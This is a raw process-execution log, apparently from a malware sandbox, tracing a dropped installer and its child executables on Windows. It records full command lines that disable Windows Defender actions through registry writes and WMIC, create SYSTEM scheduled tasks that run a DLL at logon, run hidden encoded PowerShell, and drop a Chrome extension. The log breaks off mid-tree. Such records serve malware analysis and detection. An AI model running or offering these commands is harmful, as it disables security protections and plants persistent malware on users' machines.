- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "XyyyteIMwZeutaZuw"
  2⤵
  PID:6044

C:\Users\Admin\AppData\Local\Temp\7zS7FD9.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS7FD9.tmp\Install.exe it /CUxdidbrUe 385118 /S
1⤵
- Executes dropped EXE
PID:5256
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:5900
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:1956
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:5596
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:4312
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5136
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:2544
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5020
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:4120
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5600
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:4184
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:5904
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:2288
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:1576
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:4348
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:5268
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:3192
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5208
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  PID:1020
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5404
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:4116
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1344
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5464
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5568
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5536
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4388
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5148
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4004
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:644
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6008
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2560
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2848
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5560
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5672
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5272
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4312
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5604
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5676
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5400
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1652
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4600
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:580
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1676
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2492
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4752
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5584
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 03:22:23 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\GIjqVmx.exe\" GH /fYdZdidRS 385118 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:5872
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "XyyyteIMwZeutaZuw"
  2⤵
  PID:2148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:2492
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:6076

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:4704

C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\OfDMGxv.exe
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\OfDMGxv.exe GH /KcFEdidzv 385118 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
PID:5160
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:3960
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3052
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:4896
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:1164
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5388
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5564
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:6080
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5848
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:4488
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:1716
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:5624
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:5796
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:4720
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5520
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:2436
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:5844
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:4888
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5600
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
  2⤵
  PID:3300
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:3468
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1648
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:2424
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:5752
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5592
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:1076
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\YuFyZF.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:5516
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\thLfhOD.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:648
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:4220
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:5928
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\YTcLPAZ.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:4724
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\jfskZRe.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5212
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\YDihxGf.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5712
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4524
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\TESVjbd.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5668
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5664
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
  2⤵
  PID:5700

C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\GIjqVmx.exe
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\GIjqVmx.exe GH /fYdZdidRS 385118 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:708
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:5576
- - C:\Windows\SysWOW64\forfiles.exe
